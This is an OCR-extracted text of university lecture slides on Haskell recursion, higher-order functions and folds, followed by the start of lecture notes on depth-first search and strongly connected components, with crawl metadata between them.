[19167, 19232, null], [19232, 20276, null], [20276, 20753, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 20753, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 20753, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 20753, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 20753, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 20753, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 20753, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 20753, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 20753, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 20753, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 20753, null]], "pdf_page_numbers": [[0, 143, 1], [143, 866, 2], [866, 2314, 3], [2314, 2332, 4], [2332, 4022, 5], [4022, 5434, 6], [5434, 5459, 7], [5459, 6546, 8], [6546, 7194, 9], [7194, 7713, 10], [7713, 8185, 11], [8185, 8957, 12], [8957, 8989, 13], [8989, 11403, 14], [11403, 12128, 15], [12128, 12713, 16], [12713, 13489, 17], [13489, 14503, 18], [14503, 15569, 19], [15569, 16280, 20], [16280, 17550, 21], [17550, 18383, 22], [18383, 19167, 23], [19167, 19232, 24], [19232, 20276, 25], [20276, 20753, 26]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 20753, 0.10332]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
057a6b32fca0a3ab3f7f62f34c17e673faffc2fb
Recursion and Higher-Order Functions Stephen A. Edwards Columbia University Fall 2019 Recursion in Haskell Pattern matching works nicely: ```haskell recfun <base case> = <base value> recfun <part> <rest> = <some work> <part> <combined with> recfun <rest> ``` ``` maximum' :: Ord a => [a] -> a maximum' [] = error "empty list" maximum' [x] = x -- base case maximum' (x:xs) | x > maxTail = x -- found a new maximum | otherwise = maxTail where maxTail = maximum' xs -- recurse ``` The list elements need to be ordered so we can perform > on them `maximum` is part of the standard prelude; you do not need to write this Far better: build the solution out of helpful pieces, even if they are small. It is efficient; GHC aggressively inlines code to avoid function call overhead ```haskell max' :: Ord a => a -> a -> a max' a b | a > b = a | otherwise = b maximum' :: Ord a => [a] -> a maximum' [] = error "empty list" maximum' [x] = x maximum' (x:xs) = x `max` maximum' xs ``` This is still twice as complicated as it needs to be; we’ll revisit this later. Replicate and Take replicate' :: (Num n, Ord n) => n -> a -> [a] replicate' n x | n <= 0 = [] | otherwise = x : replicate' (n-1) x The Num typeclass (-) does not include Ord (for <=), so Ord is needed. Used a guard since we’re testing a condition \( n \leq 0 \) rather than a constant. take' :: (Num n, Ord n) => n -> [a] -> [a] take' n _ | n <= 0 = [] -- base case take' _ [] = [] -- base case take' n (x:xs) = x : take' (n-1) xs -- recurse Replicate and Take Revisited The Standard Prelude implementation uses infinite lists \[ \begin{align*} take' &: (\text{Num } n, \text{Ord } n) \Rightarrow n \rightarrow [a] \rightarrow [a] \\ take' n _ | n \leq 0 &= [] \\ take' _ [] &= [] \\ take' n (x:xs) &= x : \text{take'} (n-1) \text{xs} \end{align*} \] \[ \begin{align*} \text{repeat'} &: a \rightarrow [a] \\ \text{repeat'} x = xs \text{ where } xs &= x : xs \\ & \quad \text{-- Infinite list} \end{align*} \] \[ \begin{align*} \text{replicate'} &: (\text{Num } n, \text{Ord } n) \Rightarrow n \rightarrow a \rightarrow [a] \\ \text{replicate'} n x &= \text{take'} n (\text{repeat'} x) \end{align*} \] Zip: Combine Two Lists Into a List of Pairs ```haskell zip' :: [a] -> [b] -> [(a,b)] zip' [] _ = [] zip' _ [] = [] zip' (x:xs) (y:ys) = (x,y) : zip' xs ys ``` Works nicely with lists of mismatched lengths, including infinite: ```haskell *Main> zip' [0..3] [1..5] :: [(Int, Int)] [(0,1),(1,2),(2,3),(3,4)] *Main> zip' "abc" ([1..] :: [Int]) [('a',1),('b',2),('c',3)] ``` Quicksort in Haskell - Pick and remove a pivot - Partition into two lists: smaller or equal to and larger than pivot - Recurse on both lists - Concatenate smaller, pivot, then larger quicksort :: Ord a => [a] -> [a] quicksort [] = [] quicksort (p:xs) = quicksort [x | x <- xs, x <= p] ++ [p] ++ quicksort [x | x <- xs, x > p] Efficient enough: ++ associates to the right so \( a \; ++ \; b \; ++ \; c \) is \( (a \; ++ \; (b \; ++ \; c)) \) Haskell does not have classical `for` or `do` loops. Recursion can implement either of these plus much more. Tail-recursion is just as efficient as such loops. Most of the time, however, your loop or recursive function fits a well-known pattern that is already in a Standard Prelude function that you should use instead. A key advantage of functional languages, including Haskell, is that you can build new control constructs. Partially Applied Functions The (+) syntax also permits a single argument to be applied on either side and returns a function that takes the “missing” argument: Prelude> (++ "", hello") "Stephen" "Stephen, hello" Prelude> ("Hello, " ++) "Stephen" "Hello, Stephen" Prelude> (<= (5::Int)) 10 False Prelude> (<= (5::Int)) 5 True Prelude> (<= (5::Int)) 4 True - is weird because (-4) means negative four. Use subtract: Prelude> (subtract 4) 10 6 Higher-Order Functions Passing functions as arguments is routine yet powerful ``` Prelude> :{ Prelude| applyTwice :: (a -> a) -> a -> a Prelude| applyTwice f x = f (f x) Prelude| :} Prelude> applyTwice (+5) 1 11 Prelude> applyTwice (++ " is stupid") "Stephen" "Stephen is stupid is stupid" “applyTwice takes a function and return a function that takes a value and applies the function to the value twice” Flip Standard Prelude function that reverses the order of the first arguments \[ \text{flip'} :: (a \to b \to c) \to (b \to a \to c) \] \[ \text{flip'} f = g \quad \text{where} \quad g \ x \ y = f \ y \ x \] But since the “function type” operator \( \to \) associates right-to-left, \[ \text{flip'} :: (a \to b \to c) \to b \to a \to c \] \[ \text{flip'} f \ x \ y = f \ y \ x \] Prelude> \text{zip [1..5] "Hello"} [(1,'H'),(2,'e'),(3,'l'),(4,'l'),(5,'o')] Prelude> \text{flip zip [1..5] "Hello"} [('H',1),('e',2),('l',3),('l',4),('o',5)] Prelude> \text{zipWith (flip div) [2,2..] [10,8..2]} [5,4,3,2,1] A Standard Prelude function. Two equivalent ways to code it: ```haskell map' :: (a -> b) -> [a] -> [b] map' _ [] = [] map' f (x:xs) = f x : map' f xs ``` ```haskell map'' :: (a -> b) -> [a] -> [b] map'' f xs = [ f x | x <- xs ] ``` ```haskell *Main> map (+5) ([1..5] :: [Int]) [6,7,8,9,10] *Main> map (++) "!" ["BIFF","BAM","POW"] ["BIFF!","BAM!","POW!"] ``` You’ve written many loops that fit map in imperative languages Another Standard Prelude function `zipWith` takes a function and two lists and applies the function to the list elements, like a combination of `zip` and `map`: ```haskell zipWith' :: (a -> b -> c) -> [a] -> [b] -> [c] zipWith' _ [] _ = [] zipWith' _ _ [] = [] zipWith' f (x:xs) (y:ys) = f x y : zipWith' f xs ys ``` The Standard Prelude implements `zip` with `zipWith`: ```haskell zip' :: [a] -> [b] -> [(a,b)] zip' = zipWith (,) -- the "make-a-pair" operator ``` Filter: Select each element of a list that satisfies a predicate ```haskell filter :: (a -> Bool) -> [a] -> [a] filter_ [] = [] filter p (x:xs) | p x = x : filter p xs | otherwise = filter p xs ``` ```haskell filter :: (a -> Bool) -> [a] -> [a] filter p xs = [ x | x <- xs, p x ] ``` Prelude> filter (>= 3) [1..10] :: [Int] [3,4,5,6,7,8,9,10] What’s the largest number under 100,000 that’s divisible by 3,829? Prelude> x `divides` y = y `mod` x == 0 Prelude> head (filter (3829 `divides`) [100000,99999..]) 99554 QuickSort Revisited Using *filter* instead of list comprehensions: ```haskell quicksort :: Ord a => [a] -> [a] quicksort [] = [] quicksort (p:xs) = quicksort (filter (<= p) xs) ++ [p] ++ quicksort (filter (> p) xs) ``` Similar performance; choose the one that’s easier to understand. takeWhile: Select the first elements that satisfy a predicate Same type signature as `filter`, but stop taking elements from the list once the predicate is false. Also part of the Standard Prelude ```haskell takeWhile' :: (a -> Bool) -> [a] -> [a] takeWhile' _ [] = [] takeWhile' p (x:xs) | p x = x : takeWhile' p xs | otherwise = [] ``` Prelude> takeWhile (/= ' ') "Word splitter function" "Word" What’s the sum of all odd squares under 10,000? ```haskell Prelude> sum (takeWhile (<10000) (filter odd (map (^2) [1..]))) 166650 Prelude> sum (takeWhile (<10000) [ n^2 | n <- [1..], odd (n^2) ]) 166650 ``` Twin Primes differ by two, e.g., 3 and 5, 11 and 13, etc. ```haskell Prelude> primes = f [2..] where Prelude| f (p:xs) = p : f [ x | x <- xs, x `mod` p /= 0 ] Prelude> twinPrimes = filter twin (zip primes (tail primes)) where Prelude| twin (a,b) = a+2 == b Prelude> take 7 twinPrimes [(3,5),(5,7),(11,13),(17,19),(29,31),(41,43),(59,61)] Prelude> length twinPrimes (Left as an exercise for the reader) Collatz sequences For starting numbers between 1 and 100, how many Collatz sequences are longer than 15? collatz :: Int -> [Int] collatz 1 = [1] collatz n | even n = n : collatz (n `div` 2) | otherwise = n : collatz (n * 3 + 1) numLongChains :: Int numLongChains = length (filter isLong (map collatz [1..100])) where isLong xs = length xs > 15 *Main> collatz 30 [30,15,46,23,70,35,106,53,160,80,40,20,10,5,16,8,4,2,1] *Main> numLongChains 66 **Lambda Expressions** A *lambda expression* is an unnamed function. \ is a λ missing a leg: \ \ <\text{args}> \rightarrow <\text{expr}> Things like (+ 5) and max 5 are also unnamed functions, but the lambda syntax is more powerful. Without a Lambda expression: ```haskell numLongChains = length (filter isLong (map collatz [1..100])) where isLong xs = length xs > 15 ``` Using Lambda: ```haskell numLongChains = length (filter (\xs -> length xs > 15) (map collatz [1..100])) ``` Lambda Expressions Multiple and pattern arguments: Prelude> zipWith (\a b -> a * 100 + b) [5,4..1] [1..5] [501,402,303,204,105] Prelude> map (\(a,b) -> a + b) [(1,2),(3,5),(6,3),(2,6),(2,5)] [3,8,9,8,7] Function definitions are just convenient shorthand for Lambda expressions: ``` addThree :: Num a => a->a->a->a addThree x y z = x + y + z ``` Some Lambdas are unnecessary: Prelude> zipWith (\x y -> x + y) [1..5] [100,200..500] [101,202,303,404,505] Prelude> zipWith (+) [1..5] [100,200..500] [101,202,303,404,505] Fold: Another Foundational Function Apply a function to each element to accumulate a result: \[ \text{foldl } f \ z \ [a_1,a_2,\ldots,a_n] = f \ldots(f \ (f \ z \ a_1) \ a_2)\ldots \ a_n \] \[ \text{foldl} :: (a \to b \to a) \to a \to [b] \to a \] \[ \text{foldl } f \ z \ [] = z \] \[ \text{foldl } f \ z \ (x:xs) = \text{foldl } f \ (f \ z \ x) \ xs \] Prelude> 0 + 1 + 2 + 3 + 4 + 5 15 Prelude> foldl (\acc x -> acc + x) 0 [1..5] 15 Prelude> foldl (+) 0 [1..5] 15 \[ \text{sum} :: \text{Num } a \to [a] \to a \] \[ \text{sum} = \text{foldl } (+) 0 \quad -- \text{Standard Prelude definition} \] Foldl† in action \[ \text{foldl} \quad :: \quad (a \rightarrow b \rightarrow a) \rightarrow a \rightarrow [b] \rightarrow a \] \[ \begin{align*} \text{foldl} \ f \ z \ [] & = z \\ \text{foldl} \ f \ z \ (x:xs) & = \text{foldl} \ f \ (f \ z \ x) \ xs \end{align*} \] \[ \begin{align*} \text{foldl} \ f \ 100 \ [1..3] \ \text{where} \ f & = \ \lambda z \ x \rightarrow z + x \quad -- \ a.k.a. (+) \\ = \ \text{foldl} \ f \ 100 & \ [1,2,3] \quad -- \ \text{Evaluate foldl: apply f to z and x} \\ = \ \text{foldl} \ f \ (f \ 100 \ 1) & \ [2,3] \quad -- \ \text{Evaluate f: add z and x} \\ = \ \text{foldl} \ f \ 101 & \ [2,3] \\ = \ \text{foldl} \ f \ (f \ 101 \ 2) & \ [3] \\ = \ \text{foldl} \ f \ 103 & \ [3] \\ = \ \text{foldl} \ f \ (f \ 103 \ 3) & \ [] \\ = \ \text{foldl} \ f \ 106 & \ [] \quad -- \ \text{Base case: return z} \\ = \ 106 \end{align*} \] † Technically, this is foldl’ in action; this gives the same result. foldl1: foldl starting from the first element \[ \text{foldl} :: (a \to b \to a) \to a \to [b] \to a \] \[ \text{foldl} f z [] = z \] \[ \text{foldl} f z (x:xs) = \text{foldl} f (f z x) xs \] \[ \text{foldl1} :: (a \to a \to a) \to [a] \to a \] \[ \text{foldl1} f (x:xs) = \text{foldl} f x xs \quad -- \text{Start with the list's head} \] \[ \text{foldl1} _ [] = \text{error} \text{ "Prelude.foldl1: empty list"} \] foldl vs. foldr foldl from the left; foldr from the right. Function’s arguments reversed \[ \text{foldl } f \ z \ [a_1, a_2, \ldots, a_n] = f \ (\cdots (f \ (f \ z \ a_1) \ a_2) \cdots) \ a_n \\ \text{foldr } f \ z \ [a_1, a_2, \ldots, a_n] = f \ a_1 \ (f \ a_2 \ (\cdots (f \ a_n \ z) ) ) \cdots \\ \] **foldl** \[ foldl \quad :: \quad (a \to b \to a) \to a \to [b] \to a \\ foldl \quad f \ z \quad [] \quad = \quad z \\ foldl \quad f \ z \quad (x:xs) \quad = \quad foldl \quad f \quad (f \ z \ x) \ xs \quad -- \quad f = \ \\backslash \text{acc} \ \text{x} \to \ldots \\ \] **foldr** \[ foldr \quad :: \quad (b \to a \to a) \to a \to [b] \to a \\ foldr \quad f \ z \quad [] \quad = \quad z \\ foldr \quad f \ z \quad (x:xs) \quad = \quad f \ x \ (foldr \quad f \ z \ xs) \quad -- \quad f = \ \\backslash x \ \text{acc} \to \ldots \\ \] Folds Are Extremely Powerful: They’re Everywhere concat :: [[a]] → [a] concat xss = foldr (++) [] xss reverse :: [a] → [a] reverse = foldl (\a x → x : a) [] -- Lambda expression version reverse = foldl (flip (:) ) [] -- Prelude definition and, or :: [Bool] → Bool and = foldr (&&) True or = foldr (||) False sum, product :: (Num a) => [a] → a sum = foldl (+) 0 product = foldl (*) 1 maximum, minimum :: Ord a => [a] → a maximum [] = error "Prelude.maximum: empty list" maximum xs = foldl1 max xs minimum [] = error "Prelude.minimum: empty list" minimum xs = foldl1 min xs Folds Subsume map and filter \[ \text{map}' :: (a \to b) \to [a] \to [b] \] \[ \text{map}' f \; xs = \text{foldr} (\lambda x \; acc \to f \; x : \; acc) \; [] \; xs \] A left fold also works, but is less efficient because of ++: \[ \text{map}' f \; xs = \text{foldl} (\lambda acc \; x \to acc ++ [f \; x]) \; [] \; xs \] Filter is like a conditional map \[ \text{filter}' :: (a \to \text{Bool}) \to [a] \to [a] \] \[ \text{filter}' p = \text{foldr} (\lambda x \; acc \to \text{if} \; p \; x \; \text{then} \; x : \; acc \; \text{else} \; acc) \; [] \] The Standard Prelude uses the recursive definitions of map and filter Foldr Evaluates Left-to-Right Because Haskell is Lazy Haskell’s *undefined* throws an exception *only when it is evaluated* ```haskell undefined :: a undefined = error "Prelude.undefined" foldr f z [a₁,a₂,...,aₙ] = f a₁ (f a₂(···(f aₙ z))···) ``` ```haskell Prelude> quitZero x acc = if x == 0 then 0 else x + acc Prelude> foldr quitZero 0 [3,2,1,0] 6 Prelude> foldr quitZero 0 [3,2,1,0,100] 6 Prelude> foldr quitZero 0 [3,2,1,undefined] 6 *** Exception: Prelude.undefined Prelude> foldr quitZero 0 [3,2,1,0,undefined] 6 ``` TWO LOGICIANS WALK INTO A BAR... DOES EVERYONE WANT BEER? I DON'T KNOW. I DON'T KNOW. YES! && and || are Short-Circuit Operators ```haskell (&&), (||) :: Bool -> Bool -> Bool True && x = x False && _ = False True || _ = True False || x = x and, or :: [Bool] -> Bool and = foldr (&&) True or = foldr (||) False ``` Prelude> or [True, True, undefined] True Prelude> and [True, True, undefined] *** Exception: Prelude.undefined Prelude> and [True, False, undefined] False Prelude> or [False, True, undefined] True Prelude> or [False, False, undefined] *** Exception: Prelude.undefined Foldl Evaluates Left-to-Right Because of Laziness foldl :: (a -> b -> a) -> a -> [b] -> a foldl f z [] = z -- (base) foldl f z (x:xs) = foldl f (f z x) xs -- (recurse) foldl f 100 [1..3] where f = \z x -> z + x = foldl f 100 [1,2,3] -- expand range = foldl f (f 100 1) [2,3] -- (recurse) = foldl f (f (f 100 1) 2) [3] -- (recurse) = foldl f (f (f (f 100 1) 2) 3) [] -- (recurse) = f (f (f 100 1) 2) 3 -- (base) = (f (f 100 1) 2) + 3 -- (f) = (f 100 1) + 2 + 3 -- (f) = 100 + 1 + 2 + 3 -- (+) = 101 + 2 + 3 -- (+) = 103 + 3 -- (+) = 106 -- (+) † Technically, this is foldl' in action; this is still functionally correct. Scanl and Scanr: Fold Remembering Accumulator Values ``` scanl :: (a -> b -> a) -> a -> [b] -> [a] scanl f q xs = q : (case xs of [] -> [] x:xs -> scanl f (f q x) xs) scanr :: (b -> a -> a) -> a -> [b] -> [a] scanr f q0 [] = [q0] scanr f q0 (x:xs) = f x q : qs where qs@(q:_) = scanr f q0 xs ``` Prelude> foldl (+) 0 [1..5] 15 Prelude> scanl (+) 0 [1..5] [0,1,3,6,10,15] Prelude> scanr (+) 0 [1..5] [15,14,12,9,5,0] Scanl and takeWhile Can Mimic a Do Loop How many square roots added together just exceed 1000? Prelude> length (takeWhile (<1000) (scanl1 (+) (map sqrt [1..]))) 130 Prelude> sum (map sqrt [1..130]) 993.6486803921487 Prelude> sum (map sqrt [1..131]) 1005.0942035344083 Avoiding LISP† with $ Many functions put their complex-to-compute arguments at the end; applying these in sequence give expressions of the form $f \ldots (g \ldots (h \ldots ))$ Use $ to eliminate the ending parentheses. It is right-associative at the lowest precedence so $f \ $ g \ $ h \ x$ is $f (g (h x))$ Normal argument application (juxtaposition) is at the highest precedence ```haskell infixr 0 $ -- Right-associative, lowest precedence ($) :: (a -> b) -> a -> b f $ x = f x ``` ```haskell Prelude> length (takeWhile (<1000) (scanl1 (+) (map sqrt [1..]))) 130 Prelude> length $ takeWhile (<1000) $ scanl1 (+) $ map sqrt [1..] 130 ``` † Lots of Irritating, Silly Parentheses Applying an Argument as a Function $ is the *function application* operator: it applies the function on its left to the argument on its right Juxtaposition does the same thing without an explicit operator ``` Prelude> map ($ 3) [ (4+), (10*), (^2), sqrt ] [7.0,30.0,9.0,1.7320508075688772] ``` ($ 3) is the “apply 3 as an argument to the function” function, equivalent to \( \lambda f \rightarrow f \ 3 \). Function Composition In math notation, \((f \circ g)(x) = f(g(x))\); in Haskell, \textbf{infixr 9 . \ -- Right-associative, highest precedence} \((.) :: (b \to c) \to (a \to b) \to a \to c\) \(f \cdot g = \lambda x \to f \, (g \, x)\) So \((f \cdot g \cdot h) \, x\) is \((f \, (g \, (h \, x)))\) Prelude> map (\x -> negate (abs x)) [5,-3,-6,7,-3,2,-19,24] [-5,-3,-6,-7,-3,-2,-19,-24] Prelude> map (negate . abs) [5,-3,-6,7,-3,2,-19,24] [-5,-3,-6,-7,-3,-2,-19,-24] Best used when constructing functions to pass as an argument
{"Source-Url": "http://www1.cs.columbia.edu/~sedwards/classes/2019/4995-fall/recursion.pdf", "len_cl100k_base": 6417, "olmocr-version": "0.1.49", "pdf-total-pages": 35, "total-fallback-pages": 0, "total-input-tokens": 56296, "total-output-tokens": 8262, "length": "2e12", "weborganizer": {"__label__adult": 0.00035071372985839844, "__label__art_design": 0.0004000663757324219, "__label__crime_law": 0.00025081634521484375, "__label__education_jobs": 0.0006875991821289062, "__label__entertainment": 0.00010704994201660156, "__label__fashion_beauty": 0.00012564659118652344, "__label__finance_business": 9.79304313659668e-05, "__label__food_dining": 0.0005593299865722656, "__label__games": 0.0006704330444335938, "__label__hardware": 0.0006427764892578125, "__label__health": 0.00037741661071777344, "__label__history": 0.0002205371856689453, "__label__home_hobbies": 0.00010508298873901369, "__label__industrial": 0.000324249267578125, "__label__literature": 0.0003578662872314453, "__label__politics": 0.00023877620697021484, "__label__religion": 0.000484466552734375, "__label__science_tech": 0.01152801513671875, "__label__social_life": 0.00012093782424926758, "__label__software": 0.004436492919921875, "__label__software_dev": 0.97705078125, "__label__sports_fitness": 0.0002980232238769531, "__label__transportation": 0.0004086494445800781, "__label__travel": 0.00019741058349609375}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 17444, 0.06644]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 17444, 0.66875]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 17444, 0.70182]], "google_gemma-3-12b-it_contains_pii": [[0, 89, false], [89, 672, null], [672, 1128, null], [1128, 1604, null], [1604, 2267, null], [2267, 2641, null], [2641, 3085, null], [3085, 3515, null], [3515, 3961, null], [3961, 4376, null], [4376, 4987, null], [4987, 5413, null], [5413, 5881, null], [5881, 6415, null], [6415, 6726, null], [6726, 7354, null], [7354, 7765, null], [7765, 8223, null], [8223, 8714, null], [8714, 9237, null], [9237, 9843, null], [9843, 10773, null], [10773, 11190, null], [11190, 12034, null], [12034, 12611, null], [12611, 13241, null], [13241, 13770, null], [13770, 13865, null], [13865, 14359, null], [14359, 15071, null], [15071, 15536, null], [15536, 15806, null], [15806, 16503, null], [16503, 16914, null], [16914, 17444, null]], "google_gemma-3-12b-it_is_public_document": [[0, 89, true], [89, 672, null], [672, 1128, null], [1128, 1604, null], [1604, 2267, null], [2267, 2641, null], [2641, 3085, null], [3085, 3515, null], [3515, 3961, null], [3961, 4376, null], [4376, 4987, null], [4987, 5413, null], [5413, 5881, null], [5881, 6415, null], [6415, 6726, null], [6726, 7354, null], [7354, 7765, null], [7765, 8223, null], [8223, 8714, null], [8714, 9237, null], [9237, 9843, null], [9843, 10773, null], [10773, 11190, null], [11190, 12034, null], [12034, 12611, null], [12611, 13241, null], [13241, 13770, null], [13770, 13865, null], [13865, 14359, null], [14359, 15071, null], [15071, 15536, null], [15536, 15806, null], [15806, 16503, null], [16503, 16914, null], [16914, 17444, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 17444, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 17444, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 17444, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 17444, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 17444, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 17444, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 17444, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 17444, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 17444, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 17444, null]], "pdf_page_numbers": [[0, 89, 1], [89, 672, 2], [672, 1128, 3], [1128, 1604, 4], [1604, 2267, 5], [2267, 2641, 6], [2641, 3085, 7], [3085, 3515, 8], [3515, 3961, 9], [3961, 4376, 10], [4376, 4987, 11], [4987, 5413, 12], [5413, 5881, 13], [5881, 6415, 14], [6415, 6726, 15], [6726, 7354, 16], [7354, 7765, 17], [7765, 8223, 18], [8223, 8714, 19], [8714, 9237, 20], [9237, 9843, 21], [9843, 10773, 22], [10773, 11190, 23], [11190, 12034, 24], [12034, 12611, 25], [12611, 13241, 26], [13241, 13770, 27], [13770, 13865, 28], [13865, 14359, 29], [14359, 15071, 30], [15071, 15536, 31], [15536, 15806, 32], [15806, 16503, 33], [16503, 16914, 34], [16914, 17444, 35]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 17444, 0.0]]}
olmocr_science_pdfs
2024-11-26
2024-11-26
1a5b1b3962eeb67c27a1ae9b52920102f777b720
Today’s specials: - A reminder of the depth-first search (DFS) algorithm and its properties. - Arranging the nodes of a DAG so that edges go from left to right. - An algorithm for finding strongly connected components in a digraph. 1 Introduction Depth First Search: you’ve seen this before, in 15-210, if not even earlier. Given a graph, it is a procedure that visits all the vertices of a graph. And you can build on this in many ways, to give algorithms to: - Determine the connected components of a graph. - (*) Find cycles in a directed or undirected graph. - Find the biconnected components of an undirected graph. - (*) Topologically sort a directed graph. - Determine if a graph is planar, and finding an embedding of it if it is. - (*) Find the strong components of a directed graph. If the graph has \( n \) vertices and \( m \) edges then depth first search can be used to solve all of these problems in time \( O(n + m) \), that is, linear in the size of the graph. In this lecture we will do the final item on this list: find strong components of the graph\(^1\) – though along the way we’ll touch upon the other starred topics while reviewing some basic properties of DFS. 2 Depth First Search First, some notation. We have a directed or undirected graph \( G = (V, E) \). We assume \( n \) nodes/vertices and \( m \) edges. If it is directed, we refer to the edges as arcs to emphasize they are ordered. We write an arc as \((u, v)\) or just \( uv\) — the arrow goes from \( u \) to \( v \). Node \( u \) is the tail of the arc \( uv \) and \( v \) the head. The input will be assumed to be in the adjacency-list format, where the adjacency lists are linked lists. (We won’t need the linked list structure in this lecture.) Let \( \text{adj}(v) \) denote the adjacency list of vertex \( v \) — for directed graphs we assume it contains all the edges going out of \( A \). OK. DFS. Depth First Search. The simplest graph algorithm in the book, but it has a lot of power to it. In this lecture, we’ll only consider directed graphs, the version for undirected graphs is almost identical. Initialize: for each \( v \) in \( V \) \[ \text{mark}(v) = F \] DFS(v) // Invariant: \( v \) has not been marked \[ \text{mark}(v) = T \] \(^1\)Strong components are directed analogs of connected components; we’ll define them later in this lecture. for each arc \((vw)\) in adjacency-list\((v)\) { if mark\((w)\) == F then DFS\((w)\) } Basically, we look at each arc and if the other side has not already been visited yet, we recursively visit it. Here’s an example. The labeled nodes are the ones visited by calling DFS\((A)\). The dashed edges are the ones not traversed, the dotted ones were not even looked at. A node \(w\) is reachable from \(v\) in \(G\) if there is a path \(v = v_0, v_1, v_2, \ldots, v_k = w\) such that each \((v_i, v_{i+1})\) is an arc of \(G\). **Fact 1** When DFS\((v)\) terminates, it has visited (marked) all the nodes that can be reached from \(v\). **Proof:** The simple proof is by induction. We will terminate because every call to DFS\((v)\) is to an unmarked node, and each such call marks a node. There are \(n\) nodes, hence \(n\) calls, before we stop. Now suppose some node \(w\) that is reachable from \(v\) and is not marked when DFS\((v)\) terminates. Since \(w\) is reachable, there is a path \(v = v_0, v_1, v_2, \ldots, v_k = w\) from \(v\) to \(w\), and a first node \(v_i\) on this path that is not marked. But this is impossible, because we marked \(v_{i-1}\) and would have examined the arc \((v_{i-1}, v_i)\). Of course, it may be the case that not all the nodes in \(G\) are reachable from \(v\). So really we should do the following **DFS-graph(graph G)** for all \(v\) in \(V\), mark\((v)\) = F. While there exists an unmarked node \(v\) DFS\((v)\) This process will visit all the nodes of the graph (just by the definition of the procedure). Here’s the old example. It will help to have a few more pieces of data defined, which will make reasoning about DFS much easier. One is active\((v)\), which is a flag that indicates that \(v\) is currently on the recursion stack. Two other numbers are pre\((v)\) and post\((v)\) which are “times” at which we add \(v\) to the recursion stack, and when we remove \(v\) from it. (In 15-210, these were the times at which you ENTER \(v\) and EXIT \(v\)). Here is the depth first search procedure: for all \( x \in V \) do \( \text{pre}(v) \leftarrow 0, \text{post}(v) \leftarrow 0, \text{active}(v) \leftarrow 0 \) for all \( x \in V \) do if \( \text{pre}(x) = 0 \) then DFS(\( x \)) DFS(\( v \)) \( i \leftarrow i + 1 \) \( \text{pre}(v) \leftarrow i \) \( \text{active}(v) \leftarrow 1 \) for all \( w \in \text{adj}(v) \) do if \( \text{pre}(w) = 0 \) then DFS(\( w \)) else if \( \text{pre}(w) > \text{pre}(v) \) then else if \( \text{active}(w) = 0 \) then else \( \text{active}(v) \leftarrow 0 \) \( i \leftarrow i + 1 \) \( \text{post}(v) \leftarrow i \) end DFS Below is our running example with the node labelings and the arc classification: the solid arcs are tree arcs, dashed arcs are forward arcs, the dotted arcs are cross arcs, and the dot-dashed arcs are back-arcs. Just as above, this process examines all arcs and vertices. The call DFS(\( v \)) is made exactly once for each vertex of the graph. Each arc is placed into exactly one of four classes by the algorithm: tree arcs, forward arcs, cross arcs, and back arcs. This classification of the arcs is not a property of the graph alone. It also depends on the ordering of the vertices in \( \text{adj}(v) \) and on the ordering of the vertices in the loop that calls the DFS procedure. The tree arcs have the property that either zero or one of them points to a given vertex. Therefore, they define a collection of trees, called the depth-first spanning forest of the graph. The root of each tree is the vertex with the lowest \( \text{pre} \) number (the one that was searched first). These rooted trees allow us to define the ancestor and descendant relations among vertices. The four types of arcs are related to the spanning forest as follows: - The forward arcs are arcs from a vertex to a descendant of it that are not tree arcs. This is because the test \( \text{pre}(w) > \text{pre}(v) \) indicates that \( w \) was explored after the call to DFS(\( v \)). Since the call to DFS(\( v \)) is not yet complete \( w \) must be a descendant of \( v \). Moreover, the exploration of \( w \) must be complete (it must have been popped from the execution stack for us to return to \( v \)), so we'll have \( \text{post}(w) \) \( \text{post}(v) \). To summarize, forward arcs have \( \text{pre}(v) < \text{pre}(w) < \text{post}(w) < \text{post}(v) \). This pattern is also true for tree arcs. • The cross arcs are arcs from a vertex \( v \) to a vertex \( w \) such that the subtrees rooted at \( v \) and \( w \) are disjoint. This follows because \( \text{active}(w) = 0 \) so the exploration of \( w \) is complete, and was complete before the call to DFS(\( v \)), so we’ll have \( \text{post}(w) < \text{post}(v) < \text{pre}(v) \). Therefore \( v \) is not in a subtree rooted at \( w \). Vertex \( w \) is not in a subtree rooted at \( v \) because \( \text{pre}(w) < \text{pre}(v) \). To summarize, for cross arcs \( vw \) \[ \text{pre}(w) < \text{post}(w) < \text{pre}(v) < \text{post}(v) \] • The back arcs are arcs from a vertex to an ancestor of it. The fact that \( \text{active}(w) = 1 \) indicates that the \( w 